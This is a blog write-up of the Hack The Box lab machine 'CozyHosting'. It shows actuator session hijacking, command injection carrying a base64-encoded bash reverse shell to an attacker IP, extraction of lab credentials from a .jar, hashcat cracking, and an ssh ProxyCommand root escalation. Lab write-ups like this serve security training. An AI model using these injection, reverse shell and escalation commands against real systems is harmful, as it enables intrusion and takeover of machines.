CozyHosting – Hack The Box – @lautarovculic


First, as usual, let’s configure our /etc/hosts file with the IP linked to the domain cozyhosting.htb

After that, let’s do the recon scan with nmap.

On port 80, we find the web page, which has a login.

Let’s do a scan with dirb to find other directories and possible entry points.

And we find interesting directories such as /admin and /error

The /admin directory redirects us to /login while /error gives us a Spring Boot error. It means that there may be additional endpoints in the application such as /actuator

Indeed, we see that there are sessions on the victim machine. Let’s try to modify the cookies to obtain the session of the user shown in the screenshot.

In addition, we also find endpoints such as /executeshh and /addhost in the /actuator/mappings endpoint.

We can use session cookies and access /admin directory.

Below are connection setting

Instead of using the username we can use a reverse shell.

					bash -i >& /dev/tcp/ 0>&1

It would look like the following if we encode it in base64

					echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNTEvNzc3NyAwPiYx" | base64 -d | bash

But we need URL format without gaps so we can add ${IFS%??} , ; at the end and at the beginning, and encode as URL

We will leave a rlwrap waiting.

We set up the POST in burpsuite and send the request.

We will obtain the shell.

Looking for the app directory:

Download the .jar

We read the file with jd-gui.

In find the password for postgres, and in scheduled/FakeUser.class find the creds for user kanderson:

Postgres = Vg&nvzAQ7XxR

User = kanderson

Password = MRdEQuv6-6P9

Let’s check the database

We have the admin hash, let’s take a look at it.

Let’s crack it 😀

					sudo hashcat -a 0 -m 3200 hash.txt /home/kali/Downloads/rockyou.txt

Password = manchesterunited

Now we can join as Josh.

And search for the user.txt


Let’s use sudo -l to try privilege escalation.

But since we have the user josh and the password manchesterunited, let’s log in via ssh so we can execute the command.

Let’s take a look at to see how we can escalate privileges with ssh

We will use:

					ssh -o ProxyCommand=';sh 0<&#038;2 1>&2' x

And we get the root.txt flag 😀

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *